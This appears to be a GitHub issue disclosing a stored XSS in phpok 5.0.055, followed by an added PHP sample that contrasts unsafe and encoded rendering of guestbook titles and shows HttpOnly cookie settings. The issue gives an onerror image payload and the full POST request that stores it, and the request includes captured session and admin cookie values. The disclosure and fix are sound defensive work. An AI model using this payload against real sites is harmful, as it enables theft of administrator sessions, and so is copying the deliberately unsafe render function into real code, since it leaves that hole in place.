phpok 5.0.055 Stored XSS vulnerability that can get the administrator cookie #3

Closed
Drea1v1 opened this issue Dec 8, 2018 · 1 comment

Drea1v1 commented Dec 8, 2018

Visit the URL: http://localhost/index.php?id=book

Step 1

Input an XSS payload in the title parameter, such as `<img src=x onerror=alert(document.cookie)>`

```http
POST /api.php?c=post&f=save HTTP/1.1
Host: localhost
Content-Length: 134
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://localhost
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost/index.php?id=book
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_45afd0d5e0ac79310647ac6bc5b5e084=1540478711; UM_distinctid=1677dc16b8434a-05960abb8ab529-6313363-144000-1677dc16b866e; CNZZDATA1707573=cnzz_eid%3D1882766006-1544003086-http%253A%252F%252Flocalhost%252F%26ntime%3D1544024206; admin_auth=eyJpdiI6InZNKzdDV2E1cThadUxrcXZuakszeUE9PSIsInZhbHVlIjoiUVZmcmhkb3dSZDg3bk9YT3ViTmRFSWZUSWgwWVdLSjY5NUl3Wit6RWp5RGhpUHJib0RuaTMxc0N6UU1naXcrTnRHQmJOdnFkSTRXU0tHdDliRFZ4UkJSTkZuaFp4d1BYOTA1Z1ZKSkRINW5tQmo4TkdESERjbHdSQzJQQXlmMTEiLCJtYWMiOiJkMTljYjE1YWMwOWU4ODIzN2I5YTQ1ZjNlNjcwYzdiMDJiMWIyY2U5MmQ1MmFjOWJjYzE4Nzc3OTI2YmE1MmI3In0%3D; XDEBUG_SESSION=PHPSTORM; PHPSESSID=dngti2qdtfhmektapbh7c7et11; PHPSESSION=68qgk06qt2heoci271977dqut1
Connection: close

id=book&title=%3Cimg+src%3Dx+onrror%3Dalert(1)%3E&fullname=test&email=1%40qq.com&pic=&file=&_chkcode=4083&content=%3Cp%3E111%3C%2Fp%3E
```

Step 2

When the administrator logs in and moves the mouse over to view the message information, it will trigger the payload.

Owner

qinggan commented Feb 8, 2019

Received, it has been fixed!

qinggan closed this as completed Apr 28, 2019
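
The class of fix this report calls for, as an added example that is not part of the original issue and not phpok's own code: the stored `title` is encoded when the admin message list is rendered, and the `admin_auth` cookie is marked HttpOnly so script cannot read it. The row markup, the function names and the cookie options are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Constructed sample: a guestbook record as stored after the POST in Step 1,
// with the title field holding the reported payload unchanged.
$message = [
    'title'    => '<img src=x onerror=alert(document.cookie)>',
    'fullname' => 'test',
    'email'    => '1@qq.com',
];

// Encode for HTML text and quoted-attribute contexts.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hypothetical "before": stored fields are concatenated into markup as-is,
// so the <img> tag in the title becomes live markup in the admin's browser.
function render_row_unsafe(array $m): string
{
    return '<tr title="' . $m['title'] . '"><td>' . $m['title'] . '</td>'
         . '<td>' . $m['fullname'] . '</td></tr>';
}

// Hypothetical "after": every user-supplied field is encoded at output time,
// in both the hover (title attribute) and the cell text.
function render_row_safe(array $m): string
{
    return '<tr title="' . e($m['title']) . '"><td>' . e($m['title']) . '</td>'
         . '<td>' . e($m['fullname']) . '</td></tr>';
}

// Defence in depth: an HttpOnly cookie is not exposed through document.cookie.
// Usage (PHP >= 7.3): setcookie('admin_auth', $token, admin_cookie_options());
function admin_cookie_options(): array
{
    return [
        'expires'  => 0,
        'path'     => '/',
        'secure'   => true,   // requires the admin panel to be served over HTTPS
        'httponly' => true,
        'samesite' => 'Lax',
    ];
}

echo render_row_unsafe($message), PHP_EOL;
echo render_row_safe($message), PHP_EOL;
```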